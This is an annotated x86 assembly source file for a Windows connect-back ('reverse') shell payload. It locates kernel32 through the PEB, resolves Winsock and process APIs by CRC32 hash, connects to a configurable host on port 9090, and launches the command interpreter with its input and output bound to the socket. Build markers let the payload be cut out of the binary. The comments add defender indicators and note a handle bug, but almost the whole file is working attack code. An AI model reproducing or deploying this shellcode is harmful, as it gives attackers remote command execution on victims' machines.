Connect BackDoor For ShellCode
;-----------------------------------------------------------------------
; Connect-back ("reverse") shell payload, 32-bit x86, Intel syntax,
; TASM/MASM-style directives.  The bytes assembled between the
; $SHELLCODE_BEGIN$ and $SHELLCODE_END$ markers are the payload; the
; lines after the end marker are host-program glue.
; The three include files are not on this page; the symbols they supply
; (mz_neptr, pe_exportrva, ex_*, pushad_eax, pushad_ecx, callw, wod) are
; assumed from their names and noted as such where they are used.
;-----------------------------------------------------------------------
.586.model flat                         ; NOTE(review): looks like ".586" and ".model flat" run together on one line — confirm against the original file
locals @@                               ; enable @@-prefixed local labels; presumably re-scoped by each plain label, since @@next is defined twice below — confirm
include \D.N.ASM\include\useful.inc     ; presumably defines pushad_* frame offsets, callw and wod — not visible here
include \D.N.ASM\include\MZ.INC         ; DOS header layout (mz_neptr)
include \D.N.ASM\include\PE.INC         ; PE header and export directory layouts (pe_exportrva, ex_*)
;ADDRESS equ 127,0,0,1                  ; (unused) the connect-back host is the DNS string in the data area
PORT equ 9090                           ; TCP port of the connect-back listener, host byte order (swapped at runtime)
.code
public c entry                          ; expose the payload start with C naming
db '$SHELLCODE_BEGIN$'                  ; marker a build script can search for to cut the payload out of the binary
;-----------------------------------------------------------------------
; entry — payload body.  Position independent: every data reference
; and every imported-function slot is addressed through edi (delta).
; Flow: resolve APIs by hash -> WSAStartup -> read %COMSPEC% ->
; socket + connect to DNS:PORT (retried until it succeeds) ->
; CreateProcessA with stdin/stdout/stderr bound to the socket ->
; closesocket/WSACleanup -> ret.
; Host-side indicators of this behaviour: an outbound TCP connection
; followed by a child command interpreter whose standard handles are
; the socket (bInheritHandles=TRUE, STARTF_USESTDHANDLES).
; Register roles, live for the whole body:
;   edi = delta (runtime address - assembled offset)
;   ebp = 0, pushed wherever a zero dword is needed
;   esi = 190h-byte scratch buffer on the stack (WSADATA, then %COMSPEC%)
;   ebx = the connected socket
; Stack: the two get_apicrc arguments and the 190h buffer are never
; released, so the final ret does not return to the original caller.
;-----------------------------------------------------------------------
entry:
call @@delta                            ; pushes the runtime address of @@delta
@@delta:
pop edi                                 ; edi = runtime address of @@delta
sub edi,offset @@delta                  ; edi = runtime - assembled = delta
;======code relocation: delta in edi
lea eax,[edi+k32_api]                   ; kernel32 hash table (see data area)
push eax
call get_apicrc                         ; overwrites every hash in the table with the API address
lea eax,[edi+w32_api]                   ; ws2_32 hash table
push eax
call get_apicrc
;======above: relocation + API address resolution (the two arguments are left on the stack)
sub ebp,ebp                             ; ebp = 0 for the rest of the body
sub esp,190h                            ; 400-byte scratch buffer
mov esi,esp                             ; esi -> buffer
push esp                                ; lpWSAData = buffer
push 1                                  ; wVersionRequested = 1.0
call [edi+__WSAStartup]
push 000434550h                         ; "PEC\0"
push 0534d4f43h                         ; "COMS"  -> the stack now holds "COMSPEC",0
mov eax,esp                             ; eax -> "COMSPEC"
push 104h                               ; nSize
push esi                                ; lpBuffer = scratch buffer (WSADATA no longer needed)
push eax                                ; lpName
call [edi+__GetEnvironmentVariableA]    ; buffer := path of the command interpreter
pop ecx                                 ; drop the 8-byte "COMSPEC" string
pop ecx
@@online:
push 6                                  ; IPPROTO_TCP
push 1                                  ; SOCK_STREAM
push 2                                  ; AF_INET
call [edi+__socket]
mov ebx,eax                             ; ebx = socket
lea edx,[edi+offset DNS]
push edx
call [edi+__inet_addr]                  ; eax = address if DNS is a dotted quad, else INADDR_NONE (-1)
inc eax                                 ; -1 -> 0
jz @@hostname                           ; not numeric: resolve the name
dec eax                                 ; restore the address
jmp short @@port
@@hostname:
lea edx,[edi+offset DNS]
push edx
call [edi+__gethostbyname]
or eax,eax
jz @@hostname                           ; NULL result: the lookup is retried indefinitely
mov eax, [eax+12]                       ; hostent->h_addr_list
mov eax, [eax]                          ; first entry
mov eax, [eax]                          ; first IPv4 address, already in network order
@@port:
; build a 16-byte sockaddr_in on the stack: sin_zero, sin_addr, sin_port:sin_family
push ebp                                ; sin_zero (8 bytes)
push ebp
push eax                                ; sin_addr
mov eax,PORT
xchg ah,al                              ; htons(PORT)
shl eax,16                              ; port into the high word
add eax,2                               ; sin_family = AF_INET in the low word
push eax
mov edx,esp                             ; edx -> sockaddr_in
@@connection:
push 16                                 ; sizeof(sockaddr_in)
push edx
push ebx
call [edi+__connect]
test eax,eax
jnz @@connection                        ; non-zero = failure: retry until the listener accepts
@@next:
; build STARTUPINFO on the stack, last member first (17 dwords)
push ebx                                ; hStdError  = socket
push ebx                                ; hStdOutput = socket
push ebx                                ; hStdInput  = socket
push ebp                                ; lpReserved2
push ebp                                ; wShowWindow / cbReserved2
push 257                                ; dwFlags = STARTF_USESTDHANDLES (100h) | STARTF_USESHOWWINDOW (1)
push 11
pop ecx                                 ; ecx = 11: the remaining members, dwFillAttribute down to cb, all zero
@@loop_push:
push ebp
loop @@loop_push
mov eax,esp                             ; eax -> STARTUPINFO (cb is left as 0)
push ebp                                ; PROCESS_INFORMATION: four zeroed dwords
push ebp
push ebp
push ebp
push esp                                ; lpProcessInformation
push eax                                ; lpStartupInfo
push ebp                                ; lpCurrentDirectory = NULL
push ebp                                ; lpEnvironment = NULL
push ebp                                ; dwCreationFlags = 0
push 1                                  ; bInheritHandles = TRUE, so the child receives the socket as its std handles
push ebp                                ; lpThreadAttributes = NULL
push ebp                                ; lpProcessAttributes = NULL
push ebp                                ; lpCommandLine = NULL
push esi                                ; lpApplicationName = %COMSPEC% buffer
call [edi+__CreateProcessA]
test eax,eax
jz @@quit                               ; creation failed: skip the wait
push -1                                 ; INFINITE
push eax                                ; handle argument = eax, which still holds CreateProcessA's BOOL result rather than PROCESS_INFORMATION.hProcess
call [edi+__WaitForSingleObject]
@@quit:
push ebx
call [edi+__closesocket]
call [edi+__WSACleanup]
;push 0                                 ; (disabled) alternative endings the author kept:
;call [edi+__ExitThread]                ;   end the thread,
;jmp @@online                           ;   reconnect,
;add esp,4*127                          ;   or release the stack before returning
ret
;============data used by the payload============================
; Layout: connect-back host string, then one table per DLL.  A table is
; the DLL name (NUL-terminated) followed by 32-bit hashes of the wanted
; export names (xcrc32 of the name, see below), terminated by a 0 dword.
; get_apicrc replaces each hash in place with the resolved address, so
; after relocation [edi+__name] is a function pointer.  The hash
; constants are fixed byte patterns of this payload and are usable as
; static signatures.
DNS db 'localhost',0                    ; connect-back host: dotted quad or hostname (see @@online in entry)
k32_api:
db 'kernel32',0
__ExitThread dd 080AF62E1h              ; resolved, but only referenced from the disabled lines in entry
__GetEnvironmentVariableA dd 02F87D308h
__WaitForSingleObject dd 0E058BB45h
__CreateProcessA dd 0A851D916h
dd 0                                    ; end of kernel32 table
w32_api:
db 'ws2_32',0
__WSAStartup dd 0A0F5FC93h
__WSACleanup dd 08E3398BCh
__socket dd 005E568BBh
__inet_addr dd 05308A87Eh
__gethostbyname dd 0377545A2h
__connect dd 074CFF91Fh
__closesocket dd 0A5C6D777h
dd 0                                    ; end of ws2_32 table
;-----------------------------------------------------------------------
; get_apicrc(table) — resolve one hash table in place
; In:    [esp+4] = pointer to a table: DLL name,0, hash dwords..., 0
; Out:   every hash dword overwritten with the export's address
; Calls: get_k32base, get_addr32crc, and LoadLibraryA (itself found by
;        hash in kernel32) to load the named DLL.
; Stack: the argument is removed neither here (plain retn) nor by the
;        caller.  All registers are preserved (pushad/popad).
; The LoadLibraryA result is not checked; a 0 base would be walked as
; a module by get_addr32crc.
;-----------------------------------------------------------------------
get_apicrc:
pushad
mov esi,[esp+8*4+4]                     ; esi = table (skip the 8 saved registers and the return address)
call get_k32base                        ; eax = kernel32 base
push 03FC1BD8Dh ;LoadLibraryA           ; hash of the name "LoadLibraryA"
push eax                                ; module base
call get_addr32crc                      ; eax = &LoadLibraryA (callee pops both arguments)
push esi                                ; DLL name at the start of the table
call eax                                ; LoadLibraryA(name): eax = module base
mov ebx,eax                             ; ebx = module base
sub eax,eax
lodsb                                   ; step over the NUL-terminated DLL name
test al,al
jnz $-3                                 ; back to lodsb (lodsb 1 byte + test 2 bytes)
mov edi,esi                             ; edi = esi = first hash slot; read with esi, written back with edi
@@loop:
lodsd                                   ; eax = next hash
test eax,eax
jz @@end                                ; 0 dword terminates the table
push eax                                ; hash
push ebx                                ; module base
call get_addr32crc                      ; eax = export address
stosd                                   ; overwrite the hash with the address
jmp @@loop
@@end:
popad
retn
;-----------------------------------------------------------------------
; get_addr32crc(base, hash) — find an export by name hash
; In:    [esp+4] = module base, [esp+8] = xcrc32 hash of the export name
; Out:   eax = address of the export; on exhaustion of the name table
;        eax is whatever the loop counter left (0), see @@error
; Stack: stdcall-like, ret 8 pops both arguments; other registers are
;        preserved by pushad/popad.
; Walks the export directory's name pointer table, hashes each name with
; xcrc32 and compares against the wanted hash; on a match the name's
; index is translated through the ordinal table into the address table.
; Field names (mz_neptr, pe_exportrva, ex_*) and the pushad_* frame
; offsets come from the include files, which are not on this page.
; Register roles inside the loop:
;   ebx = base, esi = wanted hash, edx = export directory (saved on
;   the stack) / current name, edi = current name-pointer slot,
;   eax = names remaining, ebp = 1-based count of names examined
;-----------------------------------------------------------------------
get_addr32crc:
pushad
mov ebx,[esp+8*4+4]                     ; ebx = module base
mov esi,[esp+8*4+8]                     ; esi = wanted hash
sub ebp,ebp ;counter                    ; ebp = 0, incremented once per name examined
mov edx,ebx
add edx,[edx.mz_neptr]                  ; edx = base + e_lfanew -> PE header
mov edx,[edx.pe_exportrva]
add edx,ebx                             ; edx -> export directory
mov eax,[edx.ex_numofnamepointers]      ; eax = number of names to examine
mov edi,[edx.ex_addresstablerva]        ; (overwritten two lines below)
add edi,ebx
mov edi,[edx.ex_namepointersrva]
add edi,ebx                             ; edi -> name pointer table
push edx                                ; save the export directory for @@found
mov edx,edi                             ; (overwritten at @@next)
@@next:
mov edx,[edi]
add edx,ebx                             ; edx -> current export name
inc ebp
pushad
mov esi,edx
sub ecx,ecx
lodsb                                   ; count bytes up to and including the NUL
inc ecx
test al,al
jnz $-4                                 ; back to lodsb (lodsb 1 + inc 1 + test 2 bytes)
mov [esp+pushad_ecx],ecx                ; pushad_ecx presumably = offset of the saved ecx in the pushad frame — confirm
popad                                   ; ecx = strlen(name)+1; everything else restored
@@cmpstr:
pushad
; mov edx,edx
sub eax,eax                             ; initial crc = 0
call xcrc32                             ; eax = crc32 of the name (edx=data, ecx=size; xcrc32 stops at the NUL anyway)
cmp eax,esi                             ; match the wanted hash?
popad                                   ; flags survive popad
jz @@found
; push eax
; sub eax,eax
; scasb
; jnz $-1
; pop eax
add edi,4                               ; next name pointer
dec eax                                 ; one fewer name remaining
jz @@error                              ; table exhausted
jmp @@next
@@found:
pop edx                                 ; edx -> export directory again
dec ebp                                 ; ebp = zero-based index of the matching name
mov ecx,[edx.ex_ordinaltablerva]
add ecx,ebx                             ; ecx -> ordinal table (16-bit entries)
movzx eax,wod [ecx+ebp*2]               ; eax = ordinal for this name; wod presumably = "word ptr" from useful.inc — confirm
mov ebp,[edx.ex_addresstablerva]
add ebp,ebx                             ; ebp -> address table
mov eax,[ebp+eax*4]                     ; rva of the export
add eax,ebx                             ; eax = absolute address
@@error:
mov [esp+pushad_eax],eax                ; return value goes into the saved-eax slot; pushad_eax presumably = that slot's offset — confirm
popad
ret 4*2                                 ; pop the two arguments
;void* get_k32base();
;-----------------------------------------------------------------------
; get_k32base — locate kernel32's base without any import
; In:    nothing
; Out:   eax = kernel32 image base; other registers preserved
; Branches on the sign of fs:[30h]: a user-mode (positive) value is
; treated as the NT PEB, a negative one as a Windows 9x structure.
; Defenders: reading fs:[30h] and walking the loader lists is the
; classic signature of import-free API resolution in injected code.
;-----------------------------------------------------------------------
get_k32base:
pushad
sub eax,eax
mov eax,fs:[eax+30h]                    ; eax = fs:[30h] (PEB on NT)
test eax,eax
js @@os_9x                              ; sign bit set: not an NT user-mode PEB
@@os_nt:
mov eax,[eax+0ch]                       ; PEB->Ldr
mov esi,[eax+1ch]                       ; Ldr->InInitializationOrderModuleList.Flink (first entry)
lodsd                                   ; eax = first entry's Flink -> second entry
mov eax,[eax+8]                         ; DllBase of that second entry; which DLL that is depends on the OS version — assumed kernel32 here, confirm for the targeted Windows
jmp @@finished
@@os_9x:
mov eax,[eax+34h]                       ; Win9x path: chain of undocumented offsets ending at the kernel32 base — not verifiable from this page
lea eax,[eax+7ch]
mov eax,[eax+3ch]
@@finished:
mov [esp+pushad_eax],eax                ; return value via the saved-eax slot of the pushad frame
popad
retn
; zhengxi's crc32(): optimised by vecna
; input: EDX=data, ECX=size, EAX=crc
; output: EAX=crc, EDX+=ECX, ECX=BL=0
; NOTE: the pushad/popad pair below restores EDX, ECX and EBX, so for the
; caller only EAX actually changes.  Bitwise, reflected CRC-32 with the
; polynomial 0EDB88320h, ~eax in and ~eax out; with EAX=0 on entry this is
; the standard CRC-32 of the bytes.  Processing also stops early at the
; first NUL byte, so a NUL-terminated name hashes the same regardless of
; whether ECX counts the terminator.  With ECX=0 the result is ~EAX.
xcrc32:
pushad
jecxz @@4                               ; empty input: skip straight to finalisation
not eax
@@1:
cmp byte ptr [edx], 0
je @@4                                  ; stop at a NUL byte
xor al, [edx]
inc edx
mov bl, 8                               ; 8 bit iterations per byte
@@2:
shr eax, 1
jnc @@3
xor eax, 0EDB88320h                     ; reflected CRC-32 polynomial
@@3:
dec bl
jnz @@2
loop @@1                                ; next byte while ecx > 0
@@4:
not eax
mov [esp+pushad_eax],eax                ; return the crc through the saved-eax slot
popad
ret
db '$SHELLCODE_END$'                    ; end marker (included in shellcode_size below)
shellcode_size equ $-entry              ; payload length from entry through the end marker
; host-program glue, outside the markers: exit with the payload size as
; the process exit code so a build script can pick it up.
mov eax,shellcode_size
push eax
callw ExitProcess                       ; callw presumably a call wrapper macro from useful.inc — confirm
end

